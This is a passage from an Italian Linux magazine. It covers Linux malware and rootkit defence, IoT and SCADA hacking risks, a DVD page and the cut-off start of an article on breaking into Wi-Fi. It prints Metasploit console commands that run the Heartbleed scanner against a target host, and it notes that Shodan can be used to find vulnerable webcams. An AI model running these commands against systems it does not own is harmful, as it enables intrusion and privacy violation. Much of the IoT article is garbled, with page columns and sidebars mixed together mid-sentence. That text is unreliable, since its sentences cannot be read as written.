Web e database, nonché a ogni altro servizio
in esecuzione. Un altro software da prendere
in considerazione è il popolare Awstats
basato su Perl. Tramite un’interfaccia Web
ben disegnata, sfogliate agilmente qualsiasi
registro. Un altro elemento da avere sempre
sottocchio è poi il carico di sistema.
Il comando uptime, per esempio, fornisce
una panoramica precisa e puntuale del lavoro
assorbito dalla CPU. Se però volete avere una
percezione ancora più chiara dei dati, potete
usare Munin, uno strumento Web che traduce
in grafici i freddi numeri di uptime. Tra gli altri
programmi utili a scovare le attività di qualche
processo canaglia, c’è anche vmstat il quale
fornisce informazioni sui tempi di attesa della
CPU e sulle richieste di swap. Il comando:
ps awwlx --sort = VSZ

Open vs closed
Un errore abbastanza diffuso consiste
nel considerare il codice Open Source più
soggetto ad attacchi a causa della sua
natura aperta. Nel 2014, possiamo
annoverare solo pochi bug degni di nota,
come il goto nella libreria GnuTLS, lo
ShellShock in Bash e Heartbleed in
OpenSSL. Nonostante chiunque con un
minimo di esperienza sia in grado di
rilevare gli errori una volta scoperti, questo
non significa che i bug fossero ben visibili
prima della loro pubblicazione. Ci sono
progetti come OpenSSL che in seguito
a problemi hanno deciso di rivedere tutto il
proprio codice apertamente. Certo, questo
li sottopone a polemiche e giudizi talvolta
sprezzanti, ma almeno hanno avuto il
coraggio di operare e senza nascondersi
dietro alla chiusura dei propri laboratori.
Qualcuno afferma che il codice proprietario
non soffre delle stesse problematiche
dell’Open Source. Per capire che non è così,
basta usare una piattaforma Windows
ogni primo martedì del mese, quando
notoriamente Microsoft è solita rilasciare
i propri correttivi in massa. Nel mese di
aprile, sono state 11 le patch (quattro delle
quali definite come critiche) a essere state
installate nei sistemi operativi di Redmond
dietro a diciture tutt’altro che chiare.

26

permette di processare tutte le informazioni
tramite liste ordinate per dimensione, le quali
includono perfino aggiornamenti sulle librerie
condivise e l’utilizzo dello swap.
I rootkit
I rootkit sono programmi malevoli che
utilizzano una grande varietà di tecniche
furtive per eludere i rilevamenti. Possono
nascondersi all’interno di altri software, nel
kernel stesso, perfino nel BIOS o in altro
firmware di qualsiasi dispositivo. In questi casi,
il rootkit è del tutto invisibile e a poco serve
mettersi a controllare i vari processi di
sistema. In altre parole, non lo troverete mai.
In tal caso è necessario guardare a programmi
specificatamente progettati per scovarli, come
chkrootkit o rkhunter. È poi possibile
installare un’applicazione di rilevamento delle
intrusioni come AIDE, utile a individuare
modifiche al filesystem. Alcuni rootkit, così
come altri malware di vario genere, possono
dipendere da un modulo insito nel kernel.
Per maggiore sicurezza, quindi, fate
in modo che quest’ultimo generi sempre
una chiave privata e un certificato (utile a
contenere la chiave pubblica) per ogni modulo.
Così facendo, eventuali moduli compilati
dovranno essere sempre firmati prima del
caricamento. Per tale scopo, potete usare un
comodo script in Perl che vi renderà la vita più
semplice. Per esempio, per firmare il modulo
acx100 (un driver particolare per alcuni
chipset wireless Texas Instruments), si può
sfruttare questo comando :
$perl /usr/src/linux/scripts/sign-file sha512 /
mnt/sdcard/kernel-signkey.priv /mnt/sdcard/
kernel-signkey.x509 acx100.ko
È importante notare come sia la chiave sia il
certificato vengano memorizzati in una scheda
SD. Il certificato è pubblico e può essere
lasciato ovunque, mentre le chiavi private
devono rimanere riservate e archiviate in un
altro supporto. Inserirle nella stessa SD
insieme al certificato pubblico, può essere
paragonato a chiudere la porta di casa
e lasciare le chiavi inserite nella toppa
all’esterno. Una volta che il kernel è stato
compilato e firmato, si deve copiare la chiave
in un posto sicuro, quindi cancellare l’originale.
Come abbiamo detto, firmare i moduli del
kernel è un buon sistema per evitare spiacevoli
sorprese. Ciò nonostante, dovete considerare
anche un’altra possibilità: un’infezione estesa
del kernel che auto-abilita la ricezione di
moduli corrotti. Questa eventualità può essere
scongiurata avviando un kernel firmato da EFI.
L’hashing delle password su Linux viene
memorizzato nel file /etc/shadow, leggibile
solo da root. Se un malintenzionato dispone di
risorse sufficienti, potrebbe tentare un attacco
bruteforce per impossessarsi di queste
password e accedere ad altri sistemi. Qualsiasi
database memorizzato su una macchina
infetta deve poi essere considerato
compromesso. Se i dati contenuti sono di tipo
personale, potrebbero essere utilizzati per
svariati scopi, oppure per compiere attacchi
di ingegneria sociale. In ogni caso, l’attaccante
potrebbe mirare a escludervi dal sistema
o semplicemente a eliminare qualsiasi dato
archiviato. Tutto dipende dalle sue intenzioni
e dal tipo di attacco che vuole portare.
Il ricercatore Andrew Morris che gestisce
un honeypot (un sistema progettato per
innescare e controllare gli attacchi),
è recentemente incappato in un attaccante
che ha tentato di cooptare alcune risorse della
sua macchina, in modo da rivenderle come
VPSes (date un’occhiata a http://morris.
guru/huthos-the-totally-100-legit-vps-
provider). Questo genere di attacchi si sta
facendo sempre più frequente e si concretizza
cercando di installare un demone minerario
che genera criptovaluta. Per fare un esempio
di cosa si può fare in tal senso sfruttando
alcune vulnerabilità, vale la pena citare il caso
dei NAS Synology. Questi, a causa di una falla
nel software DiskStation Manager (DSM),
sono diventati dei miner di Dogecoin
all’insaputa dei proprietari. Gli attaccanti,
da questo “scherzetto”, sembra siano riusciti
a racimolare la bellezza di 600.000 dollari.
Synology ha poi rilasciato un fix per DSM
a febbraio del 2014, ma l’attacco di massa
ha comunque continuato a generare entrate
anche nei mesi successivi. Per prevenire
situazioni di questo genere, si può usare
Metasploit, un Penetration Testing Software,
vale a dire una suite pensata per verificare la
tenuta del vostro sistema. Con l’uso di questa
raccolta, è possibile avere anche un report
completo sulle vulnerabilità quotate nelle CVE
digitalattackmap.com mostra i DDoS giornalieri più gravi: c’è davvero da preoccuparsi...
Malware Linux
dell’ultimo anno:
msf > search cve:2014
Per esempio, potreste poi essere interessati
al bug Heartbleed (CVE-2014-0160):
msf > use auxiliary/scanner/ssl/openssl_
heartbleed
… > set RHOSTS targetmachine.com
… > set verbose true
… > exploit
È poi fondamentale prestare attenzione agli
exploit 0-day. Infatti, si tratta di punti deboli non
ancora resi noti pubblicamente o privatamente.
Per definizione, quindi, non esistono patch
in grado di risolverli. L’unica cosa che si può
sperare è non essere contagiati.
DayZ(ero)
Purtroppo non viviamo in un mondo ideale
e gli 0-day sono piuttosto frequenti.
Soprattutto se considerate che molti di essi
vengono scoperti proprio da malintenzionati
che tutto possono fare tranne che renderli
noti e permetterne una possibile risoluzione.
L’aspetto più preoccupante, stando ai
documenti resi pubblici da Ed Snowden, è che
i governi (Stati Uniti compresi) sono spesso
coinvolti nell’acquisto e nello stoccaggio
di questi exploit. Per fortuna, comunque,
ci sono alcuni spiragli di luce, come quelli
forniti da Bug Bounty di Facebook e Pwn2Own
di Chrome che forniscono una buona
motivazione agli hacker per rivelare le
rispettive vulnerabilità che scoprono. A fronte
di questi due esempi, però, c’è da considerare
che molti progetti Open Source non possono
certo contare sulle risorse finanziare di colossi
come Facebook o Google per fare altrettanto.
Vi abbiamo quindi dimostrato come il mondo
Linux, seppure più sicuro di Windows, sia
comunque soggetto ad alti rischi per
la sicurezza. Siate sempre vigili, aggiornate
le vostre macchine e prestate attenzione.
27
 Protezione Generale

L’ATTACCO
all’internet
delle COSE
Dalle Webcam alle automobili, passando per gli smart
TV le lavatrici con IP e i pace-maker…

L’autore
Raoul Chiesa
Raoul “Nobody” Chiesa, classe ‘73, è un ethical hacker. Presidente di Security
Brokers SCpA, ricopre diversi ruoli istituzionali tra cui il Comitato Direttivo e
Tecnico-Scientifico del CLUSIT (Associazione Italiana per la Sicurezza
Informatica), membro del Permanent Stakeholders Group dell’ENISA (European
Network & Information Security Agency), Board of Directors del capitolo italiano
di OWASP e del Comitato Tecnico di AIP/OPSI, nonché Special Advisor
sull’Hackers Profiling per le Nazioni Unite presso l’UNICRI.

28
 Hacking
Le nuove frontiere dell’hacking

IPv4 vs IPv6

U
n primo aspetto da analizzare, prima di presentare
i risultati di alcune delle ricerche fatte, è il protocollo IP.
Come tutti sappiamo, lo “spazio” disponibile con IPv4
(l’attuale versione del protocollo IP) è praticamente terminato.
Questo è il motivo principale della transizione verso IPv6:
il mondo ha bisogno di nuovi indirizzi IP.
IP - Internet Protocol, è la “lingua” con la quale computer
e oggetti intelligenti comunicano fra loro. Nella versione in cui
lo utilizziamo sin dalla nascita di Internet, la versione IPv4,
è in grado di collegare circa 4,3 miliardi di dispositivi. Una cifra
apparentemente enorme, che certamente sembrava “sufficiente
a tutto” quando, diversi decenni fa, Arpanet progettò l’attuale rete
Internet. La crescente popolazione di Internet, però, sostenuta
dal sempre maggiore numero di persone che si collegano alla
Rete e dal numero di dispositivi intelligenti interconnessi - telefoni,
automobili, sensori e chi più ne ha più ne metta – ha superato
ormai da tempo il limite massimo (tecnicamente si chiama spazio
d’indirizzamento) messo a disposizione dal protocollo IPv4. semplicemente cambia. Alcuni attacchi, il phishing fra questi, sono
All’inizio del 2011 gli indirizzi IP disponibili sono terminati indipendenti dal protocollo IP e restano invariati in efficacia
e da quel momento i collegamenti avvengono grazie a tecnologie e gravità. Altri saranno più difficili da portare a termine, e altri
di condivisione e conservazione degli indirizzi IP; tecnologie ancora potrebbero essere invece facilitati con il nuovo protocollo,
che, quando sfruttate molto, introducono problemi che a dire il vero incorpora molti accorgimenti di sicurezza frutto
e malfunzionamenti. Niente panico, però: la soluzione esiste di venti anni di esperienza nell’utilizzo della vecchia versione
e sta prendendo piede. Senza clamore, invisibilmente del protocollo IP. Vero è che, lavorando quotidianamente con
ma inesorabilmente, IPv6, la nuova versione del protocollo IP aziende private e istituzioni, diversi sono già stati i casi di realtà
si sta diffondendo a macchia d’olio. La sua capacità permette che hanno subìto una violazione e furto di dati, filtrati attraverso
di interconnettere un numero enorme di dispositivi: pari a poco IPv6, semplicemente perché i device di sicurezza delle vittime
più di 3.4 seguito da 38 zeri o, per rendere meglio l’idea, non erano configurati per proteggersi anche da attacchi lanciati
un numero sufficiente a dare più che un indirizzo IP a ogni attraverso IPv6, mentre i dispositivi (router, switch, firewall, sistemi
granello di sabbia contenuto sulla crosta terrestre per una operativi) automaticamente si erano già “adattati” al nuovo
profondità di oltre un chilometro. La migrazione al nuovo protocollo oppure, in altri casi, essendo compatibili con il nuovo
protocollo è già iniziata e diversi Paesi europei hanno già una protocollo, di “default” accettavano connessioni IPv6. Connessioni
significativa percentuale di utilizzo. In Svizzera, per esempio, che, come detto poc’anzi, spesso non erano monitorizzate,
un utente residenziale su dieci già lo utilizza. In molti casi presidiate o controllate, né tanto meno regolate. Per maggiori
l’utilizzatore finale non si accorge nemmeno della transizione, approfondimenti sulla tematica IPv6 rimandiamo alla sezione
che avviene in maniera completamente trasparente. Da un punto del Rapporto CLUSIT 2013 scritto da Marco Misitano e reperibile
di vista di sicurezza il panorama non peggiora, ma non migliora: all’indirizzo http://misitano.com/ipv6.

Il CLUSIT e il suo Rapporto annuale sulla sicurezza ICT

Il CLUSIT è l’Associazione Italiana per la
Sicurezza Informatica, un ente no-profit
fondato nel 2000, con sede presso
l’Università degli Studi di Milano.
Il CLUSIT a oggi conta più di 500 soci, sia
singoli individui, professionisti dell’ICT
Security, che aziende, le quali operano nel
settore dell’Information Security. Oltre ai
“Quaderni CLUSIT”, ricerche
monotematiche e quindi focalizzate su
singoli argomenti, oltre a diverse altre
pubblicazioni e al materiale proveniente dai
seminari formativi CLUSIT (gratuiti per i
Soci), dal 2011 il CLUSIT pubblica il
“Rapporto CLUSIT sull’ICT Security in Italia”,
un profilo neutrale, indipendente e
approfondito sullo status della sicurezza
delle informazioni nel nostro Paese, frutto
del lavoro dei soci CLUSIT e con contributi
esterni importanti, tra cui segnalo la Polizia
Postale e delle Telecomunicazioni.
La tematica IPv6, alla base della “Internet of
Things”, è stata affrontata da Marco Misitano
nel Rapporto 2013. Il rapporto contiene
inoltre i risultati di un sondaggio che ci ha
consentito di studiare le tendenze del
mercato italiano dell’ICT Security,
individuando le aree in cui si stanno
orientando gli investimenti di aziende e
Pubbliche Amministrazioni, ed è completato
da numerosi focus on specifici su temi caldi
del momento, dai tablet ai Social Network,
dalle questioni del management della
sicurezza a quelle della formazione, tutti
temi già affrontati dai precedenti rapporti
CLUSIT, ma che per la loro straordinaria
dinamica ed evoluzione rappresentano
scenari completamente nuovi.
Frutto di un lavoro di analisi e ricerca che ha
impegnato nel 2013 un centinaio di
professionisti, tra cui l’autore di questo
articolo, e coinvolto oltre 200 aziende, il
rapporto rappresenta un importante punto di
riferimento per tutti coloro che operano nel
settore, e per quelle persone che si stanno
iniziando a interessare di InfoSec e
vorrebbero saperne un po’ di più. Il Rapporto
viene presentato ogni anno a giornalisti,
politici, vertici delle Istituzioni Italiane,
funzionari della PA legati al mondo ICT e ai
CIO, CSO e CISO di Grandi Aziende.

29
HackingProtezione Generale

Clusit

I
l CLUSIT è, dal 2000, al servizio
della sicurezza delle informazioni:
la consapevolezza, la formazione, il continuo
aggiornamento professionale e lo scambio
di informazioni sono gli strumenti più efficaci per
far fronte ai problemi della sicurezza informatica.
Questa associazione nasce sulla scorta delle
esperienze di altre associazioni europee
per la sicurezza informatica quali CLUSIB (B),
CLUSIF (F), CLUSIS (CH), CLUSIL (L)
che costituiscono un punto di riferimento
per la sicurezza informatica nei rispettivi paesi
da oltre 20 anni, cui si sono aggiunti APSIT -
CLUSI Tn, CLUSIBF, CLUSICI, CLUSIQ. Il CLUSIT
è aperto a ogni persona e organizzazione
che manifesti un interesse per la sicurezza
informatica.
Obiettivi
Diffondere la cultura della sicurezza
informatica presso le Aziende, la Pubblica suddivisa in Sessioni Plenarie, Tavole Rotonde,
Amministrazione e i cittadini. Atelier Tecnologici, Seminari di Associazioni
Partecipare alla elaborazione di leggi, norme e tre percorsi: Tecnico, Legale e Gestione
e regolamenti che coinvolgono la sicurezza della Sicurezza.
informatica, sia a livello comunitario che italiano.
Contribuire alla definizione di percorsi
di formazione per la preparazione
e la certificazione delle diverse figure professionali
operanti nel settore della sicurezza ICT.
Promuovere l’uso di metodologie e tecnologie
che consentano di migliorare il livello di sicurezza
delle varie realtà.
Il Security Summit è l’evento del CLUSIT aperto
a tutte le persone interessate all’affascinante
Il CLUSIT è l’Associazione Italiana per
mondo della sicurezza informatica: workshop,
la Sicurezza Informatica di cui fa parte l’autore
seminari, tavole rotonde, e addirittura un Hacking
di questo articolo (Socio Fondatore e Membro
Film Festival per l’intera durata dell’evento del Comitato Direttivo e Comitato Tecnico-
(tre giorni) hanno intrattenuto gli oltre mille Scientifico), il cui Rapporto 2014 sull’ICT Security
partecipanti. L’agenda, davvero fitta, è disponibile in Italia è disponibile da scaricare dal sito
sul sito https://www.securitysummit.it/, del Security Summit, edizione di Milano

Dal telefono alle macchine fotografiche

M
a l’IPv6 è anche il protocollo ideale per quella
che chiamiamo “l’internet delle cose”, una gigantesca
ragnatela globale, il cui obiettivo è connettere,
mettere online, tutto quello che possiamo immaginare:
smartphone, fotocamere digitali, smart TV, impianti industriali
(SCADA e Industrial Automation), automobili, lavatrici e
frigoriferi, pace maker e pompe di insulina… Già oggi la
presenza del protocollo IP nei nostri cellulari di recente
generazione è altamente pervasivo. Non solo perché
dal nostro smartphone possiamo inviare e ricevere email e
navigare, ma anche e soprattutto per le tanto amate/odiate
app, e per applicazioni che sono ormai diventate un vero e
proprio standard di comunicazione: pensiamo a WhatsApp, Anche semplicemente caricare le proprie foto via Wi Fi ci
Viber e iMessage. Il 3G è stato costruito intorno al concetto di mette a rischio di aggressioni da parte di malintenzionati
online e di Internet access, e il 4G/LTE spinge sempre di più in
questa direzione. I problemi, si sa, ci sono già, in particolare
verso gli aspetti di sicurezza e privacy dei dati. Dalle app nostri segreti, le nostre abitudini e soprattutto è sempre
“clandestine” o fasulle, le quali non sono altro che una scusa insieme a noi, ovunque andiamo. Stanno però iniziando a
per farci installare – da soli – malware sui nostri dispositivi uscire fotocamere digitali wireless, che parlano IP e dalle quali
mobili, sino alle frodi consegnate proprio per trarre vantaggio possiamo direttamente inviare le nostre fotografie verso la
dell’accesso IP dei nostri telefoni e, ancora, gli spyware Rete, da Google Foto e Flickr, oppure i nostri social network
per sorvegliare e spiare da remoto i proprietari e gli utilizzatori preferiti. Peccato che, esattamente come il proprietario può
di queste bellissime tecnologie. Senza dimenticarci le accedere a quelle foto, lo può fare anche un utente non
problematiche di privacy, la possibilità di intercettare messaggi autorizzato, come hanno dimostrato più volte ethical hacker
scambiati attraverso i software di instant messaging e chi più russi e tedeschi nel corso di diverse conferenze hacker. Il
ne ha più ne metta. Sono tantissimi anni che la scena problema è che la gestione degli accessi e della condivisione
underground e il mondo dell’ethical hacking individua file via Wi-Fi non è stato scritto in maniera sicura, e il risultato
vulnerabilità e falle di sicurezza nel mondo mobile, è che chiunque può, con minimi accorgimenti, collegarsi al
esattamente come succede per il mondo più classico dei nostro apparato e copiare le nostre foto (ma anche prendere il
sistemi operativi per PC, su Facebook e altri social network e controllo dell’apparecchio). Che dire… basta fare attenzione a
su tantissime applicazioni software, da quelle di Adobe sino a cosa fotografiamo, spostare immediatamente eventuali
Oracle. A oggi uno smartphone è sicuramente l’oggetto più contenuti molto personali, privati o imbarazzanti… aspettando
personale e privato che portiamo addosso, custodisce alcuni nel frattempo le patch del produttore – se mai arriveranno.

30
 Hacking
Le nuove frontiere dell’hacking

Conferenze hacker… per saperne di più!

Chi pensa che le “hacking conference” siano
eventi chiusi, per soli adepti e frequentate da
personaggi poco raccomandabili si sbaglia! Una
hacking conference è molto probabilmente il
modo più semplice, veloce ed economico per
tenersi aggiornati, incontrare altri appassionati
di Information Security e formarsi (o aggiornare
la propria formazione), in un ambiente aperto,
internazionale e altamente informale.
Tantissime sono oramai le hack-con, in Europa
e nel resto del mondo. Abbiamo fatto una
speciale selezione per i lettori di Linux Pro e
qui di seguito vi proponiamo due hack-con
europee da… non perdere assolutamente! Hack
in the Box AMS (HITB AMS): probabilmente
l’hack-con più famosa al di fuori degli USA.
Nata originariamente in Malesia (Kuala
Lumpur), da alcune edizioni ha la sua tappa
europea ad Amsterdam. Quest’anno si svolgerà
dal 10 al 14 aprile, e include numerosi training
tecnici, erogati nei giorni precedenti la
conferenza. Keynote e speaker famosissimi,
provenienti da tutto il mondo, e indimenticabili
“hacker’s party” sono certamente i pezzi forti di
questo imperdibile evento (e anche uno dei più
cari come biglietto di ingresso).
Informazioni e acquisto biglietti sul sito ufficiale:
https://conference.hitb.org/ una hack-con
storica, giunta oramai alla dodicesima edizione,
che si svolge nella bellissima città di Cracovia,
in Polonia. Un mix unico, tra presentazioni al
limite dell’incredibile, bellissime hostess
polacche (anche l’occhio vuole la sua parte!),
barbecue e grill, birra e vodka, all’insegna
dell’information sharing, dell’amicizia e della
sfida. Sito ufficiale, agenda e registrazione su
(biglietti di ingresso molto più economici
peraltro rispetto a HITB AMS): http://2017.
confidence.org.pl/. Per chi non conoscesse
CONFidence e volesse capire com’è può
guardare questo filmato su YouTube: http://
youtu.be/QEvN4tL3gdI.

Dalla domotica alle Smart City

C
osa succede però quando l’attacco ci arriva in casa
e in ufficio? Ha creato scalpore il fatto che la FTC (Federal
Trade Commission) USA abbia imposto a un vendor
di risolvere seri bachi di sicurezza presenti nelle proprie Webcam,
i quali permettevano (e permettono a tutt’oggi!) a estranei
di collegarsi alle nostre Webcam, evitare l’autenticazione e fare
i voyeur. Non cito la marca in questione, dato che tutti i competitor
di quel brand hanno, bene o male, vulnerabilità simili. Chiunque
di voi può interrogare Shodan (www.shodanhq.com) e ricercare
gli indirizzi IP, per esempio in Italia, di telecamere IP CCTV prodotte
da un vendor specifico, per le quali le vulnerabilità e le password
di default sono note, e diventare un “digital voyeur”, facendosi
i cavoli altrui. Parliamo, ovviamente, dell’evoluzione delle
telecamere CCTV, quelle che tutti noi utilizziamo, per esempio,
per controllare la casa dall’ufficio, attraverso Internet, oppure
il contrario, o ancora la camera dei nostri figli, il giardino e così via.
Ma i ricercatori di security, si sa, sono personaggi originali e l’ultima
cosa che vogliono è annoiarsi. Se quindi da un lato le smart TV
sono tutto sommato una recente novità, ricercatori come Luigi
Auriemma (italiano trasferitosi a Malta) e molti altri hanno già
individuato vulnerabilità di sicurezza nei “televisori intelligenti”
prodotti da Samsung, LG e tanti altri costruttori. Qui gli scenari
di frode causabili da software insicuro sono tanti, in un settore
che è nato davvero da poco. Pensiamo ai film che acquistiamo
online, oppure alla chiamata Skype che effettuiamo dal nostro
smart TV: in ambo i casi un attaccante esterno potrebbe prendere
il controllo di quelle applicazioni o di quei dati e, semplicemente,
rubarci la carta di credito utilizzata per gli acquisti online dal nostro
smart TV, oppure intercettare login e password e rivenderle poi
al black market del cybercrime. I modelli di smart TV più recenti
incorporano già la Webcam, rendendo molto appetibile a ragazzini
curiosi e criminali dell’est Europa una bella spiata nel salotto di casa
nostra, o nelle nostre camere da letto. L’ultima novità, vista con
i miei occhi in alcuni viaggi all’estero, è l’”housekeeping” digitale:
frigoriferi con connessione a 100 Mbit/s e sensori grazie ai quali
ordinare automaticamente dai supermercati il cibo che ci serve
online, lavatrici che possiamo gestire da remoto tramite
una comoda GUI, robot per le pulizie e droni per funzionalità
di controllo della sicurezza delle nostre abitazioni. Chi scrive
aveva, purtroppo, predetto in un’ANSA a fine 2013
che gli elettrodomestici “smart” sarebbero finiti nel mirino
Il concetto
dei cybercriminali: speravo di sbagliarmi, ma così non è stato e le spagnolo
mie previsioni, purtroppo, si sono avverate. Sempre più di una Smart
elettrodomestici smart (televisori, router, media center, Smart TV City, “building
e «almeno un frigorifero») vengono violati da remoto e adoperati smart
communities”.
per il più classico dei compiti assegnati agli “zombie”: inviare
L’utilizzo dell’ICT
spam. Tutto quanto sopra ci porta, inevitabilmente, a un altro
per creare “città
termine caldo: Smart City, le città intelligenti. Immaginiamo
intelligenti”
dunque le città del domani nelle quali tutto, dalle smart car alle sta vivendo
smart TV, dalla domotica agli smart GPS, dialogano tra loro, un vero e proprio
scambiano informazioni e aggiornano dati, e nelle quali il concetto momento d’oro,
di e-governance sarà effettivamente reale, funzionante e visti almeno
tangibile. Il disegno è bellissimo e intrigante ma, se pensiamo solo i tantissimi
per un momento a tutte le vulnerabilità che le tecnologie poc’anzi progetti già
elencate già oggi hanno… forse, un po’, spaventa anche quest’idea online e in corso
d’opera
delle città automatiche, automatizzate, che cambiano
dinamicamente, in funzione delle necessità dei cittadini. Le Smart
City non sono però un qualcosa di “lontano” nel tempo. A Dubai,
negli Emirati Arabi, il governo ha già iniziato il percorso per
rendere “smart” la città: cento iniziative legate a trasporti,
comunicazione, greenbuilding, energia e pianificazione urbana per
il progetto “Dubai Smart city”, con investimenti nell’ordine dei
centinaia di milioni di dollari per la città che ospiterà il prossimo
Expo mondiale, il World Expo 2020. Sono anche diversi i progetti
europei di Smart City, da Torino a Barcellona, con lavori già in
corso di realizzazione soprattutto nel nord Europa. Il problema? In
nessuno di questi fantastici progetti è citata la sicurezza

31
HackingProtezione Generale

Ecco come sono, informatica! L’e-Government è un qualcosa di fantastico, operativi commerciali (e quindi non OSS), ai furti di identità, alle
qui sotto a destra, bellissimo, sulla carta così come nella realtà: niente più code agli frodi online. Forse, anche in Italia, prima di pensare alle Smart
le automobili
sportelli della Pubblica Amministrazione, la possibilità di richiedere City, dovremmo prendere l’esempio dalla città di Monaco, in
di oggi, dal punto
certificati e documenti standocene comodamente seduti alle Germania, dove è stato appena lanciato un progetto – già
di vista di un
hacker. Tutto
nostre scrivanie, archivi digitali e tanti, tantissimi database sui funzionante! – che ha migrato 14.000 utenti del Comune da
è controllato cittadini del XXI secolo. Penso però al mondo del cybercrime, agli piattaforma closed-source (Microsoft) e piattaforma Open Source
da sensori, i quali utilizzi illegali di device, infrastrutture e database non messi in (KOLAB, basata su una distro Linux), con un risparmio immediato,
comunicano tra sicurezza, alle tante falle nel mondo del software e dei sistemi già nel primo anno, di ben quattro milioni di Euro!
di loro e con un
gateway centrale,
il “Gateway”
appunto.
Quando un hack può uccidere

A
Le automobili
bbiamo tenuto per ultime quelle keyword che, parlando Wi-Fi… Ora, il problema è molto semplice. Il mondo
più moderne
di “paura”, più ci spaventano: SCADA e Automazione dell’ethical hacking ha iniziato a fare ricerche su automotive
hanno a bordo dei
sistemi operativi,
Industriale, Automotive ed e-Health. Sono tre argomenti hacking già alcuni anni fa e Bogdan-Ioan Suta, un
come Windows, dei quali sentiremo parlare tantissimo nei prossimi anni. ricercatore di sicurezza rumeno, ha presentato una ricerca
Android o iOS, SCADA è l’acronimo di “Supervisory Control and Data sull’hacking della vecchia Volkswagen dei suoi genitori, grazie
ovviamente in Acquisition”. Oggigiorno la maggior parte delle utility che alla quale tramite il suo laptop è riuscito ad alzare e
versioni “speciali”, utilizziamo regolarmente, dalle aziende energetiche ai trasporti abbassare i finestrini elettrici, aprire e chiudere l’auto. Certo,
e la guerra (aerei, ferroviari, autostradali, metropolitana), è basata su non è un modello di auto “evoluto”, non puoi intervenire sul
per la conquista di tecnologie SCADA così come i moderni acquedotti e le centrali motore o sul sistema frenante…. Ma anche questo è già stato
questo nuovissimo di energia. Il problema, come sempre, è che questi standard e fatto. Gal Diskin, ex ricercatore di Intel Israele, ha annullato
mercato è appena
protocolli sono stati progettati senza la “sicurezza in mente”. la presentazione della sua ricerca su Automotive hacking a
iniziata, come
Questo è il motivo per cui, a oggi, i sistemi SCADA hanno avuto Hack in the Box Amsterdam. Il motivo? Ha avuto paura che
dimostrano
i recenti accordi
un incremento nella distribuzione delle vulnerabilità con terroristi e malintenzionati potessero utilizzare il know-how da
tra Ferrari e percentuali da capogiro. lui scoperto per ferire o uccidere vite umane.
Apple, e tra altri Questo ci porta all’ultima keyword che causa (forti)
costruttori e la preoccupazioni: l’e-Health. Il mondo della sanità e ospedaliero
casa di Redmond, ha scoperto l’e-health. È un’evoluzione naturale, tra spending
ma anche gli review, leggi e decreti, ottimizzazione di costi e tempi,
investimenti per e-Government, piani e direttive EU. Il problema, nuovamente,
ricerche proprio sta alla base: dispositivi e software per la sanità elettronica
in questo settore
non sono stati progettati con l’Information Security come
da parte di Big G,
priorità. Possiamo dire anzi che, nella maggior parte dei casi,
Google
gli aspetti di sicurezza non sono nemmeno stati presi in
considerazione. Nel novembre del 2012 tenni una
presentazione a Roma, presso il forum E-health
Grazie dell’Information Security Hospital, e presentai una slide su
una semplice ricerca con Google per la voce “Medical devices
L’autore desidera
hacking”, la quale restituiva più di un milione di risultati.
ringraziare: Ricercatori di sicurezza come Jerome Radcliffe, lo stesso
Marco Misitano Non pensiamo per forza a Stuxnet o alle agenzie di intelligence Barnaby Jack (recentemente scomparso), Shawn
(Cisco), Cristiano e truppe di super-hacker che trovano bug… Qui parliamo, nella Merdinger e Travis Goodspeed, hanno poi effettuato
Cafferata (DELL/ maggior parte dei casi, di ethical hacker e ricercatori dimostrazioni di hacking a peace maker con Bluetooth e Wi-Fi
SonicWall), “freelance”, i quali spendono un po’ del loro tempo libero per a bordo, piuttosto che a pompe di insulina.
Selene Giupponi, individuare vulnerabilità. Una semplice ricerca su Google per
Raffaele Regni,
SCADA exploits riporta oltre 400.000 risultati: pochi anni fa “Autenticazione”, “encryption”?
Fabrizio Cirilli e
Matteo Benedetti
questa cifra era nell’ordine delle centinaia. I sistemi SCADA No, grazie….
gestiscono anche stazioni energetiche (elettriche, nucleari, ecc.), Orbene, un conto è quando si parla di vulnerabilità che possono
(Security
Brokers), il
l’automazione industriale e tanto altro ancora. C’è di che esporre i sistemi target a Web defacement, furto di database e
CLUSIT rabbrividire, specie quando si fa una ricerca non con Google ma cose simili, ma ben altro conto è quando queste vulnerabilità
(Associazione con Shodan, prendendo in un colpo solo sia l’elenco completo e possono impattare sulle vite umane. Non credo sia il caso di far
Italiana per la gli indirizzi IP dei sistemi target, sia le relative vulnerabilità. finta di niente, è anzi giunta l’ora di agire, e di comprendere come
Sicurezza Automotive, come tutti sappiamo, è il mondo delle automobili. Il l’Information Security giochi un ruolo cruciale nelle vite dei
Informatica), Gal problema, in questo caso, è che questo settore sta sempre più cittadini e dell’intero sistema Paese. Forse, ai nostri politici e
Diskin, Barnaby parlando “ICT”. All’inizio erano i sistemi multimediali nelle nostre decision maker, farebbe bene un’attenta lettura degli ultimi report
Jack, Cedric
auto, poi il ricevitore Bluetooth. Oggi anche il mondo del World Economic Forum, nei quali già si preannuncia come
Blancher, Shawn
dell’automotive si sta evolvendo, osserviamo con attenzione alla l’insicurezza delle risorse informatiche e di telecomunicazioni che
Merdinger e
“Google Car”, ma soprattutto sappiamo che le auto di domani, utilizziamo ogni giorno, stia alla base di tutti gli scenari catastrofici
Bogdan-Ioan
Suta.
entro un breve periodo, saranno anch’esse always-on, 4G, che potremmo immaginare nei nostri peggiori incubi.

32
 Il DVD

Installa il meglio
per la tua privacy

COME FUNZIONA IL NOSTRO DVD

Inseriamo il DVD nel lettore del nostro computer. A prescindere dal sistema operativo installato, verifichiamo che il nostro computer
si avvii anzitutto caricando dal lettore ottico. Basta quindi inserire il DVD nel lettore e resettare il computer per avviare l’installazione.
Il lato A contiene Tails, il lato B contiene invece Parrot Security OS.

Se il DVD non funziona

Ogni mese, con le riviste di Sprea Editori, arrivano nelle edicole migliaia di CD e DVD. Può capitare che alcuni di questi si
rovinino durante il trasporto rompendosi o diventando illeggibili da parte del PC. In tal caso è possibile richiedere la
sostituzione gratuita del DVD inviando, entro i tre mesi successivi al mese di copertina, un’email all’indirizzo aiutocd@sprea.
it indicando il mese e il numero della rivista, le proprie generalità e il recapito al quale si vuole ricevere il DVD sostitutivo.
Per altre informazioni sul loro funzionamento, si può scrivere all’indirizzo di posta elettronica aiutocd@sprea.it

33
 Protezione Generale

Ecco come
ti bucano il Wi Fi
Vi mostriamo uno dei metodi usati
L’autore
dai criminali informatici
(o dai curiosoni) per entrare Fabio Spelta
Sistemista, sostenitore del Software

abusivamente nelle reti wireless Libero per la salvezza del mondo

e dei nani da giardino.

A
dispetto della crittografia (di per sé valida) messa
in opera da WPA2, un numero significativo dii
